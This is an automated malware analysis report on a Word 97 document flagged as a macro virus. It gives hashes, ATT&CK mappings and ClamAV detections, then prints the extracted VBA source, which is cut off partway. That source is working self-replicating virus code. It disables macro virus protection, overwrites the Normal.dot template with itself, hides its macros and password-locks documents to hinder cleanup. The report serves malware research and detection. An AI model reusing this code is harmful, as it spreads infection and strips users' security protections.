Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 c6812f83f6691eec…

MALICIOUS

Office (OLE)

Size: 43.5 KB
Created: 1997-07-07 09:37:00
Authoring application: Microsoft Word 8.0
First seen: 2012-06-14
MD5: 1d94cde3b6a205d9d44eff7b0fdb7093
SHA-1: 693c57216c1de850c3b21fa4816fc114b05fa1bd
SHA-256: c6812f83f6691eecdd1c2d31307dd0db432b4cc3fd534d4c2475a897b6d4dccb
Risk score: 180

Malware Insights

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1547.001 Registry Run Keys / Startup Folder

The sample contains VBA macros: its Document_Open handler (Document_Close and Document_New call the same routine) disables Word's macro virus protection and copies its own code into the Normal.dot template. This persistence mechanism ensures the macro runs automatically with future Word documents. The ClamAV detections 'Doc.Trojan.Lis-2' and 'Doc.Trojan.Lily-2' further indicate malicious intent.

Heuristics (3)

  • ClamAV: Doc.Trojan.Lis-2 (critical, CLAMAV_DETECTION)
    ClamAV detected this file as malware: Doc.Trojan.Lis-2
  • VBA macros detected (medium, OLE_VBA_MACROS; 1 related finding)
    Document contains VBA macro code
  • Document_Open macro (high, OLE_VBA_DOCOPEN)
    Document_Open macro

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 33988 bytes
SHA-256: 182150127378076f732f169c79645178c2f0317a5496216b91ebd9791b9f6701
Detection: ClamAV: Doc.Trojan.Lily-2
Obfuscation or payload: unlikely
Script preview (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

'L i s a 2001
'Send all suggestions (and new viruses too) to Slava_Atrancev@mail.ru
Dim dvl
Private Sub Document_Close()
 dvl = 2
 p
End Sub
Private Sub Document_New()
 dvl = 3
 p
End Sub
Private Sub Document_Open()
 dvl = 1
 p
End Sub

Private Sub p()
 '___Seed the random number generator___'
 Randomize
 '___Suppress errors___'
 On Error Resume Next
 '___Disable virus protection for Word 97___'
 Application.Options.VirusProtection = False
 '___Disable virus protection for Word 2000___'
 System.PrivateProfileString("", "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\9.0\Word\Security", "level") = 1
 If ThisDocument.Name <> "Normal.dot" Then
  '___If not running from Normal, then ...___'
  '___Wipe Normal.dot___'
  a = Application.NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.CountOfLines
  NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.DeleteLines 1, a
  '___Write our code into Normal.dot___'
  a = ThisDocument.VBProject.VBComponents.Item(1).CodeModule.CountOfLines
  b = ThisDocument.VBProject.VBComponents.Item(1).CodeModule.Lines(1, a)
  NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.insertlines 1, b
  '___Add the stealth technique to Normal___'
  c = NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.CountOfLines
  NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.insertlines c + 1, "Sub viewvbcode()"
  NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.insertlines c + 2, "On Error Resume Next"
  NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.insertlines c + 3, "a = NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.CountOfLines"
  NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.insertlines c + 4, "NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.DeleteLines 1, a"
  NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.insertlines c + 5, "NormalTemplate.Saved = True"
  NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.insertlines c + 6, "c = Application.Documents.Count"
  NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.insertlines c + 7, "For i = 1 To c"
  NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.insertlines c + 8, "d = Application.Documents.Item(i).VBProject.VBComponents.Item(1).CodeModule.CountOfLines"
  NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.insertlines c + 9, "If d > 0 Then"
  NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.insertlines c + 10, "Application.Documents.Item(i).VBProject.VBComponents.Item(1).CodeModule.DeleteLines 1, d"
  NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.insertlines c + 11, "Application.Documents.Item(i).Saved = True"
  NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.insertlines c + 12, "End If"
  NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.insertlines c + 13, "Next i"
  NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.insertlines c + 14, "Application.ShowVisualBasicEditor = True"
  NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.insertlines c + 15, "End Sub"
  '___A small nuisance for antivirus products: on close we password-protect the document against changes, and on open we remove the password, so after disinfection the user will not be able to use this file___'
  If dvl = 2 Then
   ThisDocument.Protect Type:=wdAllowOnlyFormFields, Password:="qvssqfxocisi"
  End If
  If dvl = 1 Then
   ThisDocument.Unprotect Password:="qvssqfxocisi"
   aa = NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.CountOfLines
   cc = ""
   For dd = 1 To 12
    ee = 0
    Do While ee < 97
     '___Generate the password randomly___'
     ee = Int((122 * Rnd) + 1)
    Loop
    cc = cc + Chr(ee)
   Next dd
   For bb = 1 To aa
    nn = NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.Lines(bb, 1)
    If Mid(nn, 1, 63) = "   Th
... (truncated)